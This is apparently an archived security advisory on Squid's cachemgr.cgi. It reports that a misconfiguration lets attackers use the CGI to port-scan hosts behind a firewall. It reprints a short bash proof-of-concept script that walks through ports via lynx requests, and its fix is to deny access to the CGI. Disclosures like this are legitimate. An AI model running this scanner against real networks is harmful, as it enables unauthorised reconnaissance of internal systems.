COMMAND

	cachemgr.cgi shipped with Squid can be  fooled  to  scan  hosts  besides
	firewalls

SYSTEMS AFFECTED

	Tested on : Linux Redhat 6.2
		    Squid 2.3STABLE4

		    Apache 1.3.12

	

PROBLEM

	In Francisco Sáa Muñoz advisory [http://www.ip6seguridad.com] :
	

	Due to a  misconfiguration  on  Apache  and  Squid  Is  posible  to  use
	cachemgr.cgi shipped with  Squid  to  scan  hosts  under  the  corporate
	firewall.
	

	There is a lil\' script to demonstrate the  error,  not  so  clean,  but
	useful.
	

	

	--- Begin nasty code miscachemgr.cgi ---

	#!/bin/bash -x

	

	# Port scanning using a misconfigured squid

	# using open apache

	

	# Usage miscachemgr host_vuln host_to_scan end_port

	

	# Concept: Jacobo Van Leeuwen & Francisco Sáa Muñoz

	# Coded by Francisco Sáa Muñoz

	# IP6 [Logic Control]

	

	PORT=1

	ONE=\'/cgi-bin/cachemgr.cgi?host=\'

	TWO=\'&port=\'

	THREE=\'&user_name=&operation&auth=\'

	

	mkdir from_$1_to_$2

	

	while [ $PORT -lt $3 ]; do

	

	# lynx -dump http://$1/cgi-bin/cachemgr.cgi?host=\\

	# $2&port=$PORT&user_name=&operation=authenticate&auth= > \\

	# port_$1_to_$2/$PORT.log 2>&1

	

	lynx -dump http://$1$ONE$2$TWO$PORT$THREE > from_$1_to_$2/$PORT.log 2>&1

	let PORT=PORT+1

	

	done

	--- End nasty Code ---

	

	

SOLUTION

	Deny access to the cgi